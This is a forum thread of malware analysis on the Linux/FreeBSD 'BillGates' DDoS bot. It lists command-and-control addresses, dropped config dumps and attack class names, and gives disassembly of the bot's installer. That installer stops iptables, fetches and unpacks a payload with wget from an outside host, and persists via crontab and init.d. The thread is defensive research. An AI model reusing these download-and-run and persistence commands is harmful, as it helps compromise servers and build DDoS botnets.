A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23868  by unixfreaxjp
 Thu Sep 11, 2014 9:55 pm
Exactly the same variant, with 13 flooders, VT are:
https://www.virustotal.com/en/file/c101 ... 410055879/
https://www.virustotal.com/en/file/e275 ... 409011038/
Same variant as the previously posted, with the below panel:
Image
If you see the dropped encrypted config in the default directory:
Code: Select all
00000000  41 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |A........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00                                    |.....|
00000045
That is exactly the data sent during initiation protocol to the CNC:
Image
One more drop is in the /tmp contains the parent process ID to be killed.
Code: Select all
$ cat /tmp/gates.note
14018
CNC:
Code: Select all
sa_family=AF_INET, sin_port=htons(15555), sin_addr=inet_addr("183.56.173.50")
IPv4 225523365 0t0 TCP MMD-BANGS-YOU-GOOD.malwaremustdie.org:36345->183.56.173.50:15555 (ESTABLISHED)
Location:
183.56.173.50||4134 | 183.0.0.0/10 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK 
Attachments
7z,pwd:infected
(349.05 KiB) Downloaded 58 times
 #23927  by unixfreaxjp
 Thu Sep 18, 2014 6:04 pm
Thank you to anonymous sample contributor.
This is the BillGates sample, age: about 1 week+ ago,
VT: https://www.virustotal.com/en/file/735f ... 410773773/

Slight changes detected in in (project's) source files:
Code: Select all
crtstuff.c
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadDoFun.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadKillChaos.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadTns.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
FileOp.cpp
Ijduy.cpp
Iysd76.cpp
Log.cpp
Md5.cpp
Media.cpp
NetBase.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp
and minor updates in symbols used in attack functions:
Code: Select all
11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe
The other parts seems to be similar as previous ones.

The malware file name is "8520" this is exactly the port number this BillGates used to connect the CNC:
Code: Select all
tagged 0x990 setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4)
tagged 0x990 setsockopt(4, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8)
tagged 0x990 time(NULL)
tagged 0x990 fcntl64(4, F_GETFL)
tagged 0x990 fcntl64(4, F_SETFL, O_RDWR|O_NONBLOCK)
tagged 0x990 connect(4, {sa_family=AF_INET, sin_port=htons(8520), sin_addr=inet_addr("122.224.48.63")}, 16)
CNC is in here:
Code: Select all
122.224.48.63||4134 | 122.224.0.0/12 | CHINANET | CN | - | MOVEINTERNET NETWORK TECHNOLOGY CO. LTD.
PoC of the ALIVE connection:
Code: Select all
8520 31539 31963   mmd    4u  IPv4 234322113   0t0   TCP MMD-BANGS-YOU:60029->122.224.48.63:8520 (ESTABLISHED)
except the autostart, please aware of these drops:
Code: Select all
 $ mydump /tmp/gates.lod < shows PID..
00000000  33 31 35 33 39                                    |(REDACTED)|
00000005

 $ mydump ./conf.n < Shows initial comm to send to CNC
00000000  45 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |E........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00 00 00 00  00                       |.........|
00000049

For the evidence of crime :)) this is the DDoS I recorded, see how port 80 & 443 are used for HTTP & HTTPS attack: https://gist.githubusercontent.com/unix ... Record.txt
#MalwareMustDie!
Attachments
7z,pw:infected
(363.26 KiB) Downloaded 54 times
 #23930  by unixfreaxjp
 Fri Sep 19, 2014 12:24 am
1 sample with the age of about 2 month.
https://www.virustotal.com/en/file/8cf9 ... 410791345/
CNC: 162.221.12.154:36000

There is nothing new about the BillGates ELF binary itself, EXCEPT... In this case we spotted accompanied malware sets:
1. The separated ELF downloader+installer(maybe is an updater module) accompanied to above sampes to kill, download & install ELF Billgates sample sets:
https://www.virustotal.com/en/file/050c ... 409678428/
2. The separated ELF backdoor designed to send backdoor of successful infection status to the CNC:
https://www.virustotal.com/en/file/ef15 ... 410919424/

How the downloader/installer work:

It kills these process:
Code: Select all
0x80486BF mov     dword ptr [esp], offset command ; "killall -9 kerne"
0x80486C6 call    _system
0x80486CB mov     dword ptr [esp], offset aKillall9Socket ; "killall -9 socket"
0x80486D2 call    _system
0x80486D7 mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486DE call    _system
0x80486E3 mov     dword ptr [esp], 0Ah ; seconds // sleep to let the process be killed..
0x80486EA call    _sleep
0x80486EF mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486F6 call    _system
0x80486FB mov     dword ptr [esp], offset aCdEtcInit_dIpt ; "cd / \n /etc/init.d/iptables stop"
0x8048702 call    _system
0x8048707 mov     dword ptr [esp], offset aServiceIptable ; "service iptables stop"
0x804870E call    _system
download and extract malwares in the /bin:
Code: Select all
0x8048734  mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804873B  call    _remove
0x8048740  mov     dword ptr [esp+8], offset downip ; "61.147.103.185:8089"
0x8048748  mov     dword ptr [esp+4], offset format ; "wget -c -P /bin http://%s/install.tar"
0x8048750  lea     eax, [ebp+s]
0x8048756  mov     [esp], eax      ; s
0x8048759  call    _sprintf
0x804875E  lea     eax, [ebp+s]
0x8048764  mov     [esp], eax      ; command
0x8048767  call    _system
0x804876C  mov     dword ptr [esp], offset aTarXfBinInstal ; "tar -xf /bin/install.tar -C /bin/"
0x8048773  call    _system
0x8048778  lea     eax, [ebp+s]
Which it is ALIVE now, PoC:
Code: Select all
--2014-09-19 09:38:06--  h00p://61.147. 103.185:8089/install.tar
Connecting to 61.147.103.185:8089... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1187840 (1.1M) [application/octet-stream]
Saving to: 'install.tar'
100%[===========>] 1,187,840    802KB/s   in 1.4s
2014-09-19 09:38:07 (802 KB/s) - 'install.tar' saved [1187840/1187840]
copy the BillGates binary to the /root..
Code: Select all
0x80487A3  mov     dword ptr [esp+4], offset aSKerne ; "%s/kerne"
0x80487AB  lea     eax, [ebp+s]
0x80487B1  mov     [esp], eax      ; s
0x80487B4  call    _sprintf
0x80487B9  mov     dword ptr [esp+4], offset aRootKerne ; "/root/kerne"
0x80487C1  lea     eax, [ebp+s]
0x80487C7  mov     [esp], eax      ; filename
0x80487CA  call    mycopyfile
chmod 777 those files..
Code: Select all
0x80487CF  mov     dword ptr [esp], offset aChmod0777BinMy ; "chmod 0777 /bin/mysql515"
0x80487D6  call    _system
0x80487DB  mov     dword ptr [esp], offset aChmod0777BinSo ; "chmod 0777 /bin/socket"
0x80487E2  call    _system
0x80487E7  mov     dword ptr [esp], offset aChmod0777BinCn ; "chmod 0777 /bin/cnet2"
0x80487EE  call    _system
0x80487F3  mov     dword ptr [esp], offset aChmod0755RootK ; "chmod 0755 /root/kerne"
0x80487FA  call    _system
0x80487FF  lea     eax, [ebp+s]
uninterruptly-creating an end point of comm/returns a descriptor & delete tar installer:
Code: Select all
0x804884C   mov     dword ptr [esp], offset aNohupBinSocket ; "nohup /bin/socket > /dev/null 2>&1 &"
0x8048853   call    _system
0x8048858   mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804885F   call    _remove
install scheduler w/ root permission in crontab:
Code: Select all
0x8048BAC   mov     dword ptr [esp], offset aEtcCrontab ; "/etc/crontab"
0x8048BB3   call    _fopen
      :
0x8048BF2   mov     [esp+8], eax
0x8048BF6   mov     dword ptr [esp+4], offset a55RootSS ; "*/55 * * * * root %s/%s \n"
It installs file "taskgrm-" as the init (autostart files)
Code: Select all
0x8048CEC  ov     dword ptr [esp+4], offset aEtcInit_dTaskg ; "/etc/init.d/taskgrm-"
0x8048CF4  ov     dword ptr [esp], offset aBinTaskgrm ; "/bin/taskgrm-"
0x8048CFB  all    mycopyfile
0x8048D00  ov     dword ptr [esp], offset aChmod777EtcIni ; "chmod 777 /etc/init.d/taskgrm-"
0x8048D07  all    _system
0x8048D0C  ov     dword ptr [esp], offset aLnSEtcInit_dTa ; "ln -s /etc/init.d/taskgrm- /etc/rc.d/rc"...
0x8048D13  all    _system
0x8048D18  ov     dword ptr [esp], offset aChmod777EtcRc_ ; "chmod 777 /etc/rc.d/rc5.d/taskgrm-"
0x8048D1F  all    _system
0x8048D24  ov     dword ptr [esp], offset aChkconfigAddTa ; "chkconfig --add taskgrm-"
0x8048D2B  all    _system
nasty isn't it?
Attachments
7z,infected
(354.63 KiB) Downloaded 60 times
 #23932  by unixfreaxjp
 Fri Sep 19, 2014 4:07 am
Behold.. BillGates for FreeBSD! Wow..these scums seriously want to transform all up *NIX boxes into DDoS army :shock:
Code: Select all
Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
https://www.virustotal.com/en/file/2040 ... 411098480/
Image
Attachments
7z,pwd:infected
(483.12 KiB) Downloaded 52 times
 #23945  by unixfreaxjp
 Sat Sep 20, 2014 5:17 pm
New sample infecting x64 machine: https://www.virustotal.com/en/file/85f8 ... 411229486/
Accompanied by the etc ELf malware supporting hacks (grep PID to kill process, start a process, etc)
https://www.virustotal.com/en/file/552f ... 411225997/
https://www.virustotal.com/en/file/33c1 ... /analysis/
(highlight reversing for the accompanied ELF is written in VT comment)
Attachments
7z,pwd:infected
(369.35 KiB) Downloaded 41 times
  • 1
  • 2
  • 3
  • 4
  • 5
  • 8